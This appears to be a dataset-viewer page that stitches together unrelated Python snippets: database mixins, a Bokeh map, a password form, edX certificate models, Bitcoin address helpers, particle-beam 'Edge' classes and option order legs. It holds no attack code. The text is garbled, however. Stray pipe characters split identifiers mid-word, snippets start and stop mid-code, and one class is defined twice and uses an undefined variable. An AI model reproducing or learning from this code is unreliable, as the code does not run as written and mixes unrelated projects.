joined = dict([(k, v) for k, v in six.iteritems(self.__dict__)
if not k[0] == '_'])
local.update(joined)
return six.iteritems(local)
class TimestampMixin(object):
created_at = Column(DateTime, default=lambda: timeutils.utcnow())
updated_at = Column(DateTime, onupdate=lambda: timeutils.utcnow())
class SoftDeleteMixin(object):
deleted_at = Column(DateTime)
deleted = Column(Integer, default=0)
def soft_delete(self, session=None):
"""Mark this object as deleted."""
self.deleted = self.id
self.deleted_at = timeutils.utcnow()
self.save(session=session)
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2018 David Arroyo Menéndez
# Author: David Arroyo Menéndez <davidam@gnu.org>
# Maintainer: David Arroyo Menéndez <davidam@gnu.org>
# This file is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
# This file is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of |
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with GNU Emacs; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street, Fifth Flo | or,
# Boston, MA 02110-1301 USA,
from bokeh.plotting import figure, show, output_file
from bokeh.tile_providers import CARTODBPOSITRON
output_file("tile.html")
# range bounds supplied in web mercator coordinates
p = figure(x_range=(-2000000, 6000000), y_range=(-1000000, 7000000),
x_axis_type="mercator", y_axis_type="mercator")
p.add_tile(CARTODBPOSITRON)
show(p)
|
#!/usr/bin/env python
# coding=utf-8
from toughlogger.common import pyforms
from toughlogger.common.pyforms import rules
from toughlogger.common.pyforms.rules import button_style, input_style
password_update_form = pyforms.Form(
pyforms.Textbox("tra_user", description=u"管理员名", size=32, readonly="readonly", **input_sty | le),
pyforms.Password("tra_user_pass", rules.len_of(6, 32), description=u"管理员新密码", size=32,value="", required="required", **input_style),
pyforms.Password("tra_user_pass_chk", rules.len_of(6, 32), description=u"确认管理员新密码", size=32,value="", required="required", **input_style),
pyforms.Button("submit", type="submit", html=u"<b>更新</b>", **b | utton_style),
title=u"管理密码更新",
action="/password"
)
|
xample certificates
have been started yet, returns None.
"""
try:
latest = cls.objects.filter(course_key=course_key).latest()
except cls.DoesNotExist:
return None
queryset = ExampleCertificate.objects.filter(example_cert_set=latest).order_by('-created')
return [cert.status_dict for cert in queryset]
def __iter__(self):
"""Iterate through example certificates in the set.
Yields:
ExampleCertificate
"""
queryset = (ExampleCertificate.objects).select_related('example_cert_set').filter(ex | ample_cert_set=self)
for cert in queryset:
yield cert
@staticmethod
def _template_for_mode(mode_slug, course_key):
"""Calculate the template PDF based on the course mode. """
return (
u"certificate-template-{key.org}-{key.course}-verified.pdf".format(key=course_key)
if mode_slug == 'verified'
else u"certificate-template-{key.org}-{key.course}.pdf".format(key=course_key)
)
def | _make_uuid():
"""Return a 32-character UUID. """
return uuid.uuid4().hex
class ExampleCertificate(TimeStampedModel):
"""Example certificate.
Example certificates are used to verify that certificate
generation is working for a particular course.
An example certificate is similar to an ordinary certificate,
except that:
1) Example certificates are not associated with a particular user,
and are never displayed to students.
2) We store the "inputs" for generating the example certificate
to make it easier to debug when certificate generation fails.
3) We use dummy values.
"""
# Statuses
STATUS_STARTED = 'started'
STATUS_SUCCESS = 'success'
STATUS_ERROR = 'error'
# Dummy full name for the generated certificate
EXAMPLE_FULL_NAME = u'John Doë'
example_cert_set = models.ForeignKey(ExampleCertificateSet)
description = models.CharField(
max_length=255,
help_text=ugettext_lazy(
u"A human-readable description of the example certificate. "
u"For example, 'verified' or 'honor' to differentiate between "
u"two types of certificates."
)
)
# Inputs to certificate generation
# We store this for auditing purposes if certificate
# generation fails.
uuid = models.CharField(
max_length=255,
default=_make_uuid,
db_index=True,
unique=True,
help_text=ugettext_lazy(
u"A unique identifier for the example certificate. "
u"This is used when we receive a response from the queue "
u"to determine which example certificate was processed."
)
)
access_key = models.CharField(
max_length=255,
default=_make_uuid,
db_index=True,
help_text=ugettext_lazy(
u"An access key for the example certificate. "
u"This is used when we receive a response from the queue "
u"to validate that the sender is the same entity we asked "
u"to generate the certificate."
)
)
full_name = models.CharField(
max_length=255,
default=EXAMPLE_FULL_NAME,
help_text=ugettext_lazy(u"The full name that will appear on the certificate.")
)
template = models.CharField(
max_length=255,
help_text=ugettext_lazy(u"The template file to use when generating the certificate.")
)
# Outputs from certificate generation
status = models.CharField(
max_length=255,
default=STATUS_STARTED,
choices=(
(STATUS_STARTED, 'Started'),
(STATUS_SUCCESS, 'Success'),
(STATUS_ERROR, 'Error')
),
help_text=ugettext_lazy(u"The status of the example certificate.")
)
error_reason = models.TextField(
null=True,
default=None,
help_text=ugettext_lazy(u"The reason an error occurred during certificate generation.")
)
download_url = models.CharField(
max_length=255,
null=True,
default=None,
help_text=ugettext_lazy(u"The download URL for the generated certificate.")
)
def update_status(self, status, error_reason=None, download_url=None):
"""Update the status of the example certificate.
This will usually be called either:
1) When an error occurs adding the certificate to the queue.
2) When we receieve a response from the queue (either error or success).
If an error occurs, we store the error message;
if certificate generation is successful, we store the URL
for the generated certificate.
Arguments:
status (str): Either `STATUS_SUCCESS` or `STATUS_ERROR`
Keyword Arguments:
error_reason (unicode): A description of the error that occurred.
download_url (unicode): The URL for the generated certificate.
Raises:
ValueError: The status is not a valid value.
"""
if status not in [self.STATUS_SUCCESS, self.STATUS_ERROR]:
msg = u"Invalid status: must be either '{success}' or '{error}'.".format(
success=self.STATUS_SUCCESS,
error=self.STATUS_ERROR
)
raise ValueError(msg)
self.status = status
if status == self.STATUS_ERROR and error_reason:
self.error_reason = error_reason
if status == self.STATUS_SUCCESS and download_url:
self.download_url = download_url
self.save()
@property
def status_dict(self):
"""Summarize the status of the example certificate.
Returns:
dict
"""
result = {
'description': self.description,
'status': self.status,
}
if self.error_reason:
result['error_reason'] = self.error_reason
if self.download_url:
result['download_url'] = self.download_url
return result
@property
def course_key(self):
"""The course key associated with the example certificate. """
return self.example_cert_set.course_key
class CertificateGenerationCourseSetting(TimeStampedModel):
"""Enable or disable certificate generation for a particular course.
This controls whether students are allowed to "self-generate"
certificates for a course. It does NOT prevent us from
batch-generating certificates for a course using management
commands.
In general, we should only enable self-generated certificates
for a course once we successfully generate example certificates
for the course. This is enforced in the UI layer, but
not in the data layer.
"""
course_key = CourseKeyField(max_length=255, db_index=True)
enabled = models.BooleanField(default=False)
class Meta: # pylint: disable=missing-docstring, old-style-class
get_latest_by = 'created'
@classmethod
def is_enabled_for_course(cls, course_key):
"""Check whether self-generated certificates are enabled for a course.
Arguments:
course_key (CourseKey): The identifier for the course.
Returns:
boolean
"""
try:
latest = cls.objects.filter(course_key=course_key).latest()
except cls.DoesNotExist:
return False
else:
return latest.enabled
@classmethod
def set_enabled_for_course(cls, course_key, is_enabled):
"""Enable or disable self-generated certificates for a course.
Arguments:
course_key (CourseKey): The identifier for the course.
is_enabled (boolean): Whether to enable or disable self-generated certificates.
"""
CertificateGenerationCourseSetting.objects.create(
course_key=course_key,
enabled=is_enabled
)
class CertificateGenerationConfiguration(ConfigurationModel):
"""Configure certificate generation.
Enable or disable the self-generated certific |
#!/usr/bin/env python
import binascii
import hashlib
from reversecoin.bitcoin.key import CKey as Key
from reversecoin.bitcoin.base58 import encode, decode
def myhash(s):
return hashlib.sha256(hashlib.sha256(s).digest()).digest()
def myhash160(s):
h = hashlib.new('ripemd160')
h.update(hashlib.sha256(s).digest())
return h.digest()
def getnewaddress():
# Generate public and private keys
key = Key()
key.generate()
key.set_compressed(True)
private_key = key.get_privkey()
public_key = key.get_pubkey()
private_key_hex = private_key.encode('hex')
public_key_hex = public_key.encode('hex')
public_key_bytearray = bytearray.fromhex(public_key_hex)
# Perform SHA-256 and RIPEMD-160 hashing on public key
hash160_address = myhash160(public_key_bytearray)
# add version byte: 0x00 for Main Network
extended_address = '\x00' + hash160_address
# generate double SHA-256 hash of extended address
hash_address = myhash(extended_address)
# Take the first 4 bytes of the second SHA-256 hash. This is the address checksum
checksum = hash_address[:4]
# Add the 4 checksum bytes from point 7 at the end of extended RIPEMD-160 hash from point 4. This is the 25-byte binary Bitcoin Address.
binary_address = extended_address + checksum
# Convert the result from a byte string into a base58 string using Base58Check encoding.
address = encode(binary_address)
return public_key, private_key, address
def public_key_to_address(public_key):
public_key_hex = public_key.encode('hex')
public_key_bytearray = bytearray.fromhex(public_key_hex)
# Perform SHA-256 and RIPEMD-160 hashing on public key
hash160_address = myhash160(public_key_bytearray)
# add version byte: 0x00 for Main Network
extended_address = '\x00' + hash160_address
# generate double SHA-256 hash of extended address
hash_address = myhash(e | xtended_address)
# Take the first 4 bytes of the second SHA-256 hash. This is the address checksum
checksum = hash_address[:4]
# Add the 4 checksum bytes from point 7 at the end of extended RIPEMD-160 hash from point 4. This is the 25-byte binary Bitcoin Address.
binary_address = extended_address + checksum
address = encode(binary_address)
return address
def public_key_hex_to_address(public_key_hex):
public_key_bytearray = bytearray.fromhex(pu | blic_key_hex)
# Perform SHA-256 and RIPEMD-160 hashing on public key
hash160_address = myhash160(public_key_bytearray)
# add version byte: 0x00 for Main Network
extended_address = '\x00' + hash160_address
# generate double SHA-256 hash of extended address
hash_address = myhash(extended_address)
# Take the first 4 bytes of the second SHA-256 hash. This is the address checksum
checksum = hash_address[:4]
# Add the 4 checksum bytes from point 7 at the end of extended RIPEMD-160 hash from point 4. This is the 25-byte binary Bitcoin Address.
binary_address = extended_address + checksum
address = encode(binary_address)
return address
# fix this
def address_to_public_key_hash(address):
binary_address = decode(address)
# remove the 4 checksum bytes
extended_address = binary_address[:-4]
# remove version byte: 0x00 for Main Network
hash160_address = extended_address[1:]
return hash160_address
def public_key_hex_to_pay_to_script_hash(public_key_hex):
script = "41" + public_key_hex + "AC"
return binascii.unhexlify(script)
def address_to_pay_to_pubkey_hash(address):
print "Not implemented >>>>>>>>>>>>>>>>>>>"
exit(0)
def output_script_to_public_key_hash(script):
script_key_hash = binascii.hexlify(myhash160(bytearray.fromhex(binascii.hexlify(script[1:-1]))))
return script_key_hash
def address_to_output_script(address):
pass
if __name__ == "__main__":
address1 = "16UwLL9Risc3QfPqBUvKofHmBQ7wMtjvM"
address2 = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
public_key_hex1 = "0450863AD64A87AE8A2FE83C1AF1A8403CB53F53E486D8511DAD8A04887E5B23522CD470243453A299FA9E77237716103ABC11A1DF38855ED6F2EE187E9C582BA6"
public_key_hex2 = "04678afdb0fe5548271967f1a67130b7105cd6a828e03909a67962e0ea1f61deb649f6bc3f4cef38c4f35504e51ec112de5c384df7ba0b8d578a4c702b6bf11d5f"
print "address: ", address1
print "public key_hex: ", public_key_hex1
#print "public_keys_hex: ", public_key_hex1, public_key_hex2
print "public key to address: ", public_key_hex_to_address(public_key_hex1)
print "address to public key hash: ", binascii.hexlify(address_to_public_key_hash(address1))
# print "public key hash: ", binascii.hexlify(myhash160(bytearray.fromhex(public_key_hex1)))
|
from pseudoregion import *
class Edge(PseudoRegion):
"""EDGE Fringe field and other kicks for hard-edged field models
1) edge type (A4) {SOL, DIP, HDIP, DIP3, QUAD, SQUA, SEX, BSOL, FACE}
2.1) model # (I) {1}
2.2-5) p1, p2, p3,p4 (R) model-dependent parameters
Edge type = SOL
p1: BS [T]
If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the exit edge.
Edge type = DIP
p1: BY [T]
Edge type = HDIP
p1: BX [T]
Edge type = DIP3
p1: rotation angle [deg]
p2: BY0 [T]
p3: flag 1:in 2:out
Edge type = QUAD
p1: gradient [T/m]
Edge type = SQUA
p1: gradient [T/m]
Edge type = SEX
p1: b2 [T/m2] (cf. C. Wang & L. Teng, MC 207)
Edge type = BSOL
p1: BS [T]
p2: BY [T]
p3: 0 for entrance face, 1 for exit face
Edge type = FACE
This gives vertical focusing from rotated pole faces.
p1: pole face angle [deg]
p2: radius of curvature of reference particle [m]
p3: if not 0 => correct kick by factor 1/(1+delta)
p4: if not 0 ==> apply horizontal focus with strength = (-vertical strength)
If a FACE command is used before and after a sector dipole (DIP), you can approximate a rectangular dipole field.
The DIP, HDIP, QUAD, SQUA, SEX and BSOL edge types use Scott Berg's HRDEND routine to find the change in transverse
position and transverse momentum due to the fringe field.
"""
def __init__(
self,
edge_type,
model,
model_parameters_list,
name=None,
metadata=None):
PseudoRegion.__init__(self, name, metadata)
self.edge_type = edge_type
self.model = model
self.model_parameters = model_parameters
class Edge(Field):
"""
EDGE
1) edge type (A4) {SOL, DIP, HDIP,DIP3,QUAD,SQUA,SEX, BSOL,FACE}
2.1) model # (I) {1}
2.2-5) p1, p2, p3,p4 (R) model-dependent parameters
Edge type = SOL
p1: BS [T]
If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the exit edge.
Edge type = DIP
p1: BY [T]
Edge type = HDIP
p1: BX [T]
Edge type = DIP3
p1: rotation angle [deg]
p2: BY0 [T]
p3: flag 1:in 2:out
Edge type = QUAD
p1: gradient [T/m]
Edge type = SQ | UA
p1: gradient [T/m]
Edge type = SEX
p1: b2 [T/m2] (cf. C. Wang & L. Teng, MC 207)
Edge type = BSOL
p1: BS [T]
p2: BY | [T]
p3: 0 for entrance face, 1 for exit face
Edge type = FACE
This gives vertical focusing from rotated pole faces.
p1: pole face angle [deg]
p2: radius of curvature of reference particle [m]
p3: if not 0 => correct kick by the factor 1 / (1+δ)
p4: if not 0 => apply horizontal focus with strength = (-vertical strength)
If a FACE command is used before and after a sector dipole ( DIP ), you can approximate a rectangular dipole field.
The DIP, HDIP, QUAD, SQUA, SEX and BSOL edge types use Scott Berg’s HRDEND routine to find the change in
transverse position and transverse momentum due to the fringe field.
"""
begtag = 'EDGE'
endtag = ''
models = {
'model_descriptor': {
'desc': 'Name of model parameter descriptor',
'name': 'model',
'num_parms': 6,
'for001_format': {
'line_splits': [
1,
5]}},
'sol': {
'desc': 'Solenoid',
'doc': '',
'icool_model_name': 'SOL',
'parms': {
'model': {
'pos': 1,
'type': 'String',
'doc': ''},
'bs': {
'pos': 3,
'type': 'Real',
'doc': 'p1: BS [T] '
'If the main solenoid field is B, use p1=-B for the entrance edge and p1=+B for the '
'exit edge. (You can use this to get a tapered field profile)'}}},
}
def __init__(self, **kwargs):
Field.__init__(self, 'EDGE', kwargs)
def __call__(self, **kwargs):
Field.__call__(self, kwargs)
def __setattr__(self, name, value):
if name == 'ftag':
if value == 'EDGE':
object.__setattr__(self, name, value)
else:
# Should raise exception here
print '\n Illegal attempt to set incorrect ftag.\n'
else:
Field.__setattr__(self, name, value)
def __str__(self):
return Field.__str__(self)
def gen_fparm(self):
Field.gen_fparm(self) |
from kaleidoscope.globals import SecType
class OrderLeg(object):
def __init__(self, quantity, contract):
"""
This class is an abstraction of an order leg of an option strategy. It holds the information
for a single order leg as part of an entire option strategy.
"""
self.quantity = quantity
self.contract = contract
def reverse(self):
""" reverse the the position by negating the quantity """
self.quantity *= -1
class OptionLeg(OrderLeg):
""" Holds information of an option leg """
def __init__(self, option, quantity):
self.sec_type = SecType.OPT
super().__init__(quantity, option)
class StockLeg(OrderLeg):
""" Holds information | of an stock leg """
def __init__(self, | symbol, quantity):
self.sec_type = SecType.STK
super().__init__(quantity, symbol)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.